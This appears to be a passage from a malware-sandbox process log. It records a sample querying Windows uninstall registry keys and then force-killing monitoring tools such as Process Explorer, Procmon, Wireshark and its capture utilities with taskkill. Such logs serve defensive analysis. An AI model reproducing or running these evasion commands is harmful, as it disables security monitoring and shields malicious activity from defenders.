C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:323⤵PID:4764
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4784
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:643⤵PID:4820
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:323⤵PID:4840
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4860
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:643⤵PID:4896
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:323⤵PID:4912
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4932
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:643⤵PID:4968
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:323⤵PID:4988
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:5008
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:5076
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:4120
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:4232
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:4204
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:4400
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:4460
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:4600
-